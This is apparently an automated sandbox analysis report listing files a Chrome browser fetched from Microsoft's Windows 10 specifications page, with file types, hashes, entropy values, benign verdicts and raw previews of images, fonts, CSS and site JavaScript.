                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (1575)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):169884
                                                                                                                      Entropy (8bit):4.99876151266667
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:WiUfu27gZraC5d1+ZcejRw/Fwuwx6xQ2+7rkTerQPmZl04:WiUfu27gZOEdQV6tw3x6xQ2irkSr5lZ
                                                                                                                      MD5:EDFEC65E7C5DD0274A9FB76B6693B08A
                                                                                                                      SHA1:AAF388949CD18C00003E48618BD64E42AD8AE9CC
                                                                                                                      SHA-256:955624BC314CCE5ACBB061D08C3E532C8CBEC7C117A116842B059A60D39FF5F4
                                                                                                                      SHA-512:AF3ED5B827189EB0C6CD837F821883F20464F07CDA8629530FA4AC09457A8AB2E0CAB4AACBC2EBED03704309E3034F8F2600AB8FF04D1DF2E27EB38B7A1CA14E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/en-us/windows/windows-10-specifications
                                                                                                                      Preview:<!DOCTYPE HTML>..<html lang="en-US" dir="ltr">.<head>. . .. ..... . . . . . . . .. . Start of ADDITIONAL DEBUG INFO ** cv.html **.. CVToken: CASMicrosoftCV4cd5dd74.0. End of ADDITIONAL DEBUG INFO -->.... . . . . . <meta charset="UTF-8"/>. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>. <meta http-equiv="x-ua-compatible" content="ie=edge"/>. . <meta name="keywords" content="Windows 10 requirements,windows 10 specifications,windows 10 system requirements,windows deprecations" />. . <meta name="twitter:site" content="@windows" />. . <meta name="twitter:creator" content="@microsoft" />. . <meta name="ms.lang" content="en" />. . <meta
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2832
                                                                                                                      Entropy (8bit):7.92569260000134
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:5vgIfLwwvMw0oRW3lJOef6SE771axbtO4SSlPuVmcW3lIMJUCfVA2WNwfUFzzrPL:mIfL7v0oRWHOUEn1aH/Ll5h3KMJUcjWN
                                                                                                                      MD5:9F25C34D443324665BB679F0C9716FF0
                                                                                                                      SHA1:6224748E3C5968F23CF4717A3FFDB797A609DBAA
                                                                                                                      SHA-256:65CBC7C735A938DCD2F8C5F74090229DF93E974613E757B0920F63DAEF5E2989
                                                                                                                      SHA-512:BCAC42EBEE72C4443E7BCAAF10F94A02F17F0B2E7560EF766A41B808FD9E5BDA55871C92001C6A04B39CF0EF46958A0DE6DC981D8A8B5E3170E32230A7233FF4
                                                                                                                      Malicious:false
                                                                                                                      Preview:RIFF....WEBPVP8 .....'...*d.d....%..W..9.%.+.O....O....W.S.....#.........px.~......W.....9.@.....g.....'.N.../.......f....@......B...g..........{;.o.........~..........g........`~.{.~.|.....Rl.;w..T. ..nk6..P........=./.JZo...%..n..>q.,.6..z..oq...u62......A.J<.mC.zvJ,..#..?....M.......:.S..d.1..W...[...S..G......b...%...@.E..C.9..........f....}n..L......0I./B].1..q... ....-..U.....b.hZ..zL.M.m..m.\.3y..n.1(..V.C#..I....'..{3....QZ..........2O....y...|.....^.e.l...0.*......c...=.?~2.n8.e}#+..|....4...h..d..m..".....v<..j.@M.Y.?'.=s...w.0T.mv.....Y...?....{.y......~.v.g......./.'.p.nA.k2..]..e..*?cF..]...n..@._....SI.....l......X.L..N6.q....M.Q..U.s..6S..q..!.P.g.7.Nu.3.Av....luT.............]6..;c!.D."W..C9....B.p.......n>..y...s..@F.g..]rN]o..'..I...0.U...Ibv.J..........<0.N......g#.A].....>.>^......{.!2I...V.He.*...A.....U_qf..59.T...1.?..4f...`l.dl.....G.|^........:..c...".. ....?......u.?.-...8zw..^Yc....y.7r[.&.;].{....,.H....M.._
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):32
                                                                                                                      Entropy (8bit):4.327819531114783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Aq7KKlMT9:AqeKWT9
                                                                                                                      MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                      SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                      SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                      SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                      Preview:[class*="z-"]{position:relative}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (507)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1570
                                                                                                                      Entropy (8bit):4.964227241339809
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:3jp9cCfqk3rG/OcXBFBStOcf5W6UMyKyV/8RR5Lh/NgQQRWVvEwMvghoQ2aM0/vD:3jhlzcjbchWGyd58lRQweHQ24glA+J1k
                                                                                                                      MD5:799F7DC6C3727B83CEC920A004E6B985
                                                                                                                      SHA1:8E24FEC9E4F64001BBA989029FFC3E9C7C703820
                                                                                                                      SHA-256:1CAFEC3DDD8B49D61D8A6206D3D7ABBE4833DA0AD852CA3295DAF137242AC1D3
                                                                                                                      SHA-512:4834456FF369DF119CCE262439E64F4E7D9542FACB32615B0D4998FF1083EB9ADCCFB3D1D62F09BAD8F35482914B265D0149F7FDB921C1718DE19CD595F79765
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/stickybanner/v1/stickybanner/clientlibs/site.min.ACSHASH799f7dc6c3727b83cec920a004e6b985.js
                                                                                                                      Preview:'use strict';const closeButtonStickyBanner=document.querySelector(".sticky-banner-close"),stickyBannerElement=document.querySelector(".sticky-banner"),chatBotInSticky=document.querySelector(".chat-bot");.stickyBannerElement&&(closeButtonStickyBanner&&(closeButtonStickyBanner.addEventListener("click",function(){hideStickyBanner();const a=document.querySelector(".click-start");a&&a.classList.remove("d-none")}),closeButtonStickyBanner.addEventListener("keydown",handleKeyDown)),onScrollHideBanner,window.addEventListener("scroll",onScrollHideBanner),window.addEventListener("resize",()=>{setTimeout(()=>onScrollHideBanner(),600)}));.function onScrollHideBanner(){var a=document.getElementById("uhf-footer");let c=document.querySelector(".closebtnclicked");var b=stickyBannerElement.offsetHeight;document.querySelector(".fixed-back-to-top").style.bottom=b+"px";if(a){b=document.getElementsByClassName("sticky-banner-hide");a=a.getBoundingClientRect();var d=window.innerHeight;c||(a.top<=d&&0<=a.botto
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3164)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34401
                                                                                                                      Entropy (8bit):5.567515913811421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                      MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                      SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                      SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                      SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1290)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11629
                                                                                                                      Entropy (8bit):5.449562181288923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:D+BJaYpdowNJ0EwWnvUaBBVaJxQvqKTAphPgffazesLZEU1bsLM7vImzwXdrQ9Cr:D+DDdowNJ0EwWnvUaBBVaJxQvqKTAphS
                                                                                                                      MD5:BB93CF674BEB54673814249DCF4EFC96
                                                                                                                      SHA1:3190F4BE4D37525C6B3222B93EEAFBC66B538E94
                                                                                                                      SHA-256:9653EB19E7206B44513D92E4C9359B289FC2478D4611AE01C5798C89C8211E70
                                                                                                                      SHA-512:D7E09140CF399BDEB513544617FABD95AB62BE0D9DD265B2A9E5EB5D1DC29497FE5A4088E66A00C4AEBB9529A217354EBEF512E504B22245CF8C12DC3D95B449
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var currentLocale=$("html").attr("lang").toLowerCase(),currentPage=window.location.pathname.toLowerCase(),targetPage="/en-us/windows/business/windows-11-pro",enableExperiments=document.querySelector("meta[name*\x3d'enabled-experiment']"),enableExperimentsValue=void 0!=enableExperiments&&null!=enableExperiments?enableExperiments.content:"",DB_AUDIENCES="Software \x26 Technology;Business Services;Telecommunications;University;Financial Services;Manufacturing;Education;Construction;Healthcare \x26 Medical;K12".split(";"),.win_personalization={"en-us":{alt:{"Software \x26 Technology":"A man working at a standing desk surrounded by three monitors with coding information on screens.","Business Services":"A conference room with Microsoft Teams on monitor and several people around a table with laptop open, working on schematic.",Telecommunications:"A single telecommunications tower rising amongst a sunset and mountains.",University:"Several college-age students with laptops open,
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (728)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11405
                                                                                                                      Entropy (8bit):5.337832455968521
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ei4mI8A10VNEHbnIB89tGRbvlG/bUgck7L8Dap8z+vRjQfymrQy1Zy1Gy1M+qmWW:eiy1F7nIB89tGRbvaUBvk8qjQfymrQy8
                                                                                                                      MD5:FF9CACB22668C4F6174E0AF4A2BE89F9
                                                                                                                      SHA1:EC9ED15001A3E13404660B6EA09F99C512E08882
                                                                                                                      SHA-256:EF39A5CC6826231852FD8D60736867DA31E7E9036F3575B1DC4846DC6FB86A3B
                                                                                                                      SHA-512:267064DCB16AB4B9B19756C2313CCB9E5B467A41427DE9BF46158A1C2231699EC43D51C2F201D97C02AFA31BF5011FF471035CF10C7DC6003299B86D85C52806
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-site.min.ACSHASHff9cacb22668c4f6174e0af4a2be89f9.js
                                                                                                                      Preview:'use strict';var UHFButton=$("header #c-uhf-nav-cta \x3e a");0<$("meta[name\x3d'blue-cta']").length&&UHFButton.addClass("blue-cta");UHFButton.css("visibility","visible");var mainLandmark=$("main"),rootNode=$(".root");0< !mainLandmark.length&&0<rootNode.length&&rootNode.attr("role","main");.function changeSupToAnchor(){try{var a="",b="",c=[];$("sup:not(.no-link)").each(function(){a=$(this).text();a=a.replace("*(","");a=a.replace(")","");c=a.split(", ");for(var e=0;e<c.length;e++)b+="\x3ca aria-label\x3d'Footnote "+c[e]+"' href\x3d'javascript:void(0);' class\x3d'c-hyperlink supBLink'\x3e\x3cspan class\x3d'supText'\x3e"+c[e]+"\x3c/span\x3e\x3c/a\x3e\x3cspan\x3e, \x3c/span\x3e";$(this).html(b);b=""});$("sup").find("span:last").remove();var d=$(".list-unstyled li a.superscript");d.attr("href",."javascript:void(0);");d.addClass("supLink");d.each(function(){0==$(this).find(".supFn").length&&$(this).wrapInner("\x3cspan class\x3d'supFn'\x3e\x3c/span\x3e")})}catch(e){console.log(e)}}.function n
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 29888, version 0.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):29888
                                                                                                                      Entropy (8bit):7.993034480673089
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:768:b2epE/P8HSbsbNl+GfEMuHyS4aAyoVfszfHS1W:6eSkgsbGGanzAjIyg
                                                                                                                      MD5:E465F101F881B07CCFBB55D51D18135F
                                                                                                                      SHA1:0D76B152EA1AE4AA68DB36DCC7BD204ACDC571D3
                                                                                                                      SHA-256:6F5EBFD0FC9A520ADCA234FDD34B4DFBEB106942A6F44E65FC1AC54F7D2D6498
                                                                                                                      SHA-512:2C1F730DB5108DDE4731F22838AD7EEF4D6698ED5EA0C0951B81B21722DF8051623923672C46F9397F81E74741CDEC794F03AAC37E532D1223A1A1CE448C73AA
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/fonts/support-icons/mdl2/latest_v4_70.woff2
                                                                                                                      Preview:wOF2......t........X..tb.........................`..`..6.*..Y..... ....6.$..,.. .. ..s. ..S."..`...@.."..........!!.T5..?.........#t..7. .. ~"?A..A...4./..}.'.D.8.E......C......T..o.......l.UJ*..SB...U.D6..W..uV.j,...+.>"N...}.&E..P~....z..w...Z".k...S:..t.7.fA.ic;%HZi...W.....w...I.p..........=>....) X ....@B......R ..P..$H.....h.{,..X..l. ..uY.w.Kc..+........r.H....... .....!....7$.b......@(Mp..,."z..(......V....y.E..w\...n./...&...+...R.......\~d,.....S..r%.s.s.......h...:.@.!h..(.< .@..0.P2H*..!..r.6..V.r.:..)T.9T..n......;....+a...).L+....eX....|.x...$]hS....+e+ HK.H'Q..RJ..X...}.....l....=S.G.e.{..I%9.1.O~k....@.$.{.M*^.......~z...2...r.]b..[......(.H... ...z.)...&....9..$.Q1F...1......7C..UJ...T..F....Z..K.......F..&L0c...p..N8..g...W\...q........Oz..O./......#..... ..L0B.A(..#..#..D..(..M4b.A,..`A.q.'..$ .D$..d..B.RIE.iH'..d .L.....M6r.A..3......PH!.(B1.(......2.S..*PI%..B5......:.S....H#.hB3.h......6...:.I'..B7.......>...+V.0.A.1...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (503)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):558
                                                                                                                      Entropy (8bit):4.98634955391743
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:c83DOkFYerjD6tD7fgu1M+WqQRxsZAsDFYAWCyQPO:cmZr6t/zpeT/oWCyaO
                                                                                                                      MD5:A3BC5418F2834309CE2918B15F3B8EEA
                                                                                                                      SHA1:62BA2712C6D4960F1057E103F6E1F3C95F2C701B
                                                                                                                      SHA-256:B2B62643A7C4FE4A4E12934AD819F0293CC00181B78D8091AFFFF3617CEB96B1
                                                                                                                      SHA-512:460E22E36E93BEC194D00D47754108539D2E54FF59D4293EEC25463BC3D642879C10D9BBFD881BBE5EC244819F325C422B6D7A7504000BBCE432E4D2A08FB58B
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";function e(e){return document.querySelectorAll(e)}function t(e,t){e.remove(),t.style.removeProperty("display")}window.addEventListener("load",(function(){var o,r=e(".ocpSectionLayout .ocpSection"),n=e(".ocpSectionLayout .shimmer-effect");if(r.length===n.length)for(var i=0;i<n.length;i++){var c=(o=n[i],Number(o.getAttribute("shimmer-delay")));setTimeout(t,c,n[i],r[i])}else n.forEach((function(e){e.remove()})),r.forEach((function(e){e.style.removeProperty("display")}))}))}();.//# sourceMappingURL=shimmerExperiment.Main.min.js.map
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3618
                                                                                                                      Entropy (8bit):7.927185096934077
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:7MX/zsJdnoyrScwrFhEmNg0UuMQcYQXiWIwheMs+:7+AJdnnrQ00UsOE+
                                                                                                                      MD5:4E5B2AAAB56D5439F181579EAE911ADC
                                                                                                                      SHA1:CE1F66351F1EDD03EADB8104F8009DE0E1C8BF4B
                                                                                                                      SHA-256:3B17ACCA4955E114A23D24244AA773A464D8599497365FFB8D97D5CCC791BD7A
                                                                                                                      SHA-512:338D1A49549A82886718182F909A7A28E4DA6555BF6F23611F404C111201F9D14BFE62C59B68ABD4271A9A7ADF3F80128E65ED60C05370A80EF2090F0A8925F8
                                                                                                                      Malicious:false
                                                                                                                      Preview:RIFF....WEBPVP8X...........-..ALPHq.......m.........9..a62. !.2.2?..mm..j..i....m+..g..m.m.I.6Im.n.$.'\.}?wG.....O.o.E.,.".?.g]..6..]./R.y.....smb....6l....R.6l.asw...!j._.o!.i6..mDJ_6.]#"...B.o..smb.....y>..t.Q...Dy6q."...6....c.....5L..........T..O..<.L./..mo(.bQ=...*v. S.0%........J/..{9.1..H4...t..+..... ...._..&....i&].j.j...8]...!..X.t...U..R,...B.kU+.d*m......l.t.....\...E%D\.dw.$.\....C..w...-t..Z..............#.RO.....LJ....w667.q..O@.......\........??..}.............%..../R..z.Llk.7....d\...%.x...9..5.H....'..+w..2...q..+"..*V'..i..t6..?.z.r...h..c..G<G....o.I.{..XH)....RJ.I.(#i....%..... pR.Z.........~.J.....g...q...;v ......a..?..0.s.2.. ...\..../......>......:.0.u_...9[]P.)R.#...O....VFD.....3 G.0..R.z....j..@t...Kr.d.6..4.....d|.\.-.4-R.M..IQ.T..N(..K-.s..O-..r4....)o..H...h..?JK27...<.H.W.\......bVw.. ...tR8....N.....|...l....`...s..YED.-.....%2.Hh)"....W...D.S.+...QR....:FK.%b.\YjkE.MNIq.8!..]...[.TPw.H.cb..VR.Q.=......D
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (605)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):179808
                                                                                                                      Entropy (8bit):5.556656445593751
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:xLp14+FgmOlITmhHDBrWnW+9BDI8nvtmmRHVi3J11HFaANDVDoO:xLp3EHDBrWW2BjvRREJPHFXNh
                                                                                                                      MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                      SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                      SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                      SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/custom-oneds.min.ACSHASHc3aec3d03bc5447975e3ee25b53f6c32.js
                                                                                                                      Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26288
                                                                                                                      Entropy (8bit):7.984195877171481
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                                      MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                      SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                      SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                      SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                                      Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (534)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):19236
                                                                                                                      Entropy (8bit):4.957542756789534
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:9zzYyDqAWpM8go1q7q9Qfg7c7obVebVYbVlbVg7Lq/qVqJqZ9jk/kVkaBVKBVWH5:9zzYyDqAWpM8go1q7q9Qfg7c7oReRYRS
                                                                                                                      MD5:AC48C90DAF8C653B94A6858350DE0C59
                                                                                                                      SHA1:164611585875F2F3FF1D2384D307A79C328856E9
                                                                                                                      SHA-256:772D95D573FB7E287D7C9CA726D997F57457D464274647A2EF6FE9ACE7FA048C
                                                                                                                      SHA-512:16427EC4CC9E0959A393DC55139717EF5A5E0D5542084588FA888763641A0DBED4A64EC43C2E3DC0DFFFDD2AB47C3F304024EE5A4DFA98DA60C0C0067AA58843
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/Inpagenavigation/v1/Inpagenavigation/clientlibs/sites.min.ACSHASHac48c90daf8c653b94a6858350de0c59.css
                                                                                                                      Preview:.custom-sticky-nav .hidden-visibility{visibility:hidden}..custom-sticky-nav.stuck .hidden-visibility{visibility:visible}..custom-sticky-nav.stick{position:fixed;top:0;left:0;right:0;width:100%;z-index:1020;transition:position .3s ease-in-out}..Inpagenavigation .hide-on-load .fixed-sticky,.Inpagenavigation .hide-on-load .sticky,.custom-sticky-nav .nav-item.active::before{display:none}.@media only screen and (min-width:620px) and (max-width:642px){.custom-sticky-nav:not(.stuck) .windows-mobile li .dropdown .dropdown-menu.menu-height{height:100px;overflow-y:scroll}..Inpagenavigation .custom-sticky-nav.stuck .windows-inpage-nav ul.nav-links-mobile-fall li.active ul.dropdown-menu{height:100px;overflow-y:scroll}.}.@media only screen and (max-width:320px){.custom-sticky-nav.stuck .windows-inpage-nav .windows-mobile .dropdown .dropdown-menu,.custom-sticky-nav.stuck ul.nav-links-mobile-fall .dropdown .dropdown-menu{height:70px !important;overflow-y:scroll !important}.}..Inpagenavigation .hide-o
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32761)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):207132
                                                                                                                      Entropy (8bit):5.120233025860125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:KWHSGu7HDm48tljfy6l6Fr1RPG4xy8Swqp:KgWDm48tljfy6l6Fr1RPG4xy8Swqp
                                                                                                                      MD5:BE9ECFC70EAE42CCAC8A69FE1E11332F
                                                                                                                      SHA1:B8ED04004EF83444576DC39A0289652825092742
                                                                                                                      SHA-256:F590C43ACB8FE26F9D019BEAB2C935655E04A78C1E7CF637B68746A3490610D4
                                                                                                                      SHA-512:21BE3071A5A480B4E957409B125D0454845C3DC7D13C85466E73FBC2D09621EC3C7A7F5A754D21BB5BBB6BA9B30B4D054AD2176595BD607D7498BB4552450DE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/launch-ENbb9d0de7cc374dc99259df2c4b823cef.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-12-27T06:55:08Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENbb9d0de7cc374dc99259df2c4b823cef",stage:"production"},dataElements:{"JSLL RedTiger":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0}}},MSCC_Consent:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!(void 0!==window.mscc&&"function"==typeof window.mscc.hasConsent&&!window.mscc.hasConsent())}}},CMS:{storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0?"RedT":"string"==typeof window.mldcc?"Azure":document.querySelector&&document.querySele
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):15286
                                                                                                                      Entropy (8bit):7.920093772155082
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PBOSXIcsH16kp+153RInfDCuhcuCMmr+sAY:ADcsUs+7SfDJhcuCM0zAY
                                                                                                                      MD5:B1266F754B66F7B007B60511E2A2C4A0
                                                                                                                      SHA1:2A7A404B98732BDEB9CD63C7A672AC0011788AEB
                                                                                                                      SHA-256:B0A544B82B7B83A42F0AEC9C46909290726F4F57BF437264FBE0CB17C2827B7B
